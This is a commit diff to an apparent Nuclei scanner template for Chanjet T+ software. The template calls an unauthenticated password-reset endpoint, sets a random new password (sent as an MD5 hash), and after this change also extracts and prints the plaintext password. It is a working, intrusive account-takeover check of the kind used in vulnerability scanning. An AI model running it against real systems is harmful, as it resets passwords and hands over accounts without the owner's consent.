Update chanjet-tplus-unauth-update.yaml
parent
2baf5c59d4
commit
da6554fe50
|
@ -11,13 +11,17 @@ info:
|
||||||
verified: true
|
verified: true
|
||||||
tags: tplus,unauth,chanjet,intrusive
|
tags: tplus,unauth,chanjet,intrusive
|
||||||
|
|
||||||
|
variables:
|
||||||
|
password: '{{randstr}}'
|
||||||
|
hash: '{{md5("{{password}}")}}'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method=SetNewPwd"
|
- "{{BaseURL}}/tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method=SetNewPwd"
|
||||||
|
|
||||||
body: |
|
body: |
|
||||||
{"pwdNew":"{{md5(randstr)}}"}
|
{"pwdNew":"{{hash}}"}
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -34,3 +38,8 @@ http:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- '"Password: " + password'
|
||||||
|
|
Loading…
Reference in New Issue